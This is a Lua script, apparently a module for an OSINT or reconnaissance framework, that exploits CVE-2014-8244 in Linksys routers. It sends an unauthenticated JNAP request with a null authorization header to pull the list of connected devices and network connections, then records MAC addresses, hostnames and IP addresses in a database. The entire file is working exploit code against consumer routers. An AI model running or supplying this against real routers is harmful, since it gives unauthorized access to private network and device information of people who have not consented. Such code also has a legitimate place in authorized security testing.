kpcyrd/cve-2014-8244
function run()
local network = getopt('network')
if not network then
return 'network option is missing'
end
local network_id = db_select('network', network)
if not network_id then
return 'network not found in database'
end
local router = getopt('router')
if not router then
return 'router option is missing (http://192.0.2.1:9000/)'
end
local target = url_join(router, 'JNAP/')
debug(target)
local session = http_mksession()
local headers = {}
headers['Content-Type'] = 'application/json; charset=UTF-8'
headers['X-JNAP-Action'] = 'http://linksys.com/jnap/core/Transaction'
headers['X-JNAP-Authorization'] = 'null'
local req = http_request(session, 'POST', target, {
headers=headers,
body='[{"action":"http://linksys.com/jnap/devicelist/GetDevices","request":{"sinceRevision":0}},{"action":"http://linksys.com/jnap/networkconnections/GetNetworkConnections","request":{}}]',
})
local r = http_send(req)
if last_err() then return end
if r['status'] ~= 200 then
return 'http error: ' .. r['status']
end
body = json_decode(r['text'])
if last_err() then return end
if body['result'] ~= 'OK' then
return 'JNAP request failed'
end
local now = datetime()
for i=1,#body['responses'] do
rr = body['responses'][i]['output']
if rr['devices'] then
for j=1,#rr['devices'] do
device = rr['devices'][j]
debug(device)
name=device['friendlyName']
macs=device['knownMACAddresses']
connections=device['connections']
for k=1,#macs do
device_id = db_add('device', {
value=macs[k],
hostname=name,
})
if last_err() then return end
end
for k=1,#connections do
ipaddr = connections[k]['ipAddress']
mac = connections[k]['macAddress']
device_id = db_add('device', {
value=mac,
last_seen=now,
})
if last_err() then return end
db_add_ttl('network-device', {
network_id=network_id,
device_id=device_id,
ipaddr=ipaddr,
last_seen=now,
}, 180)
if last_err() then return end
end
end
end
end
end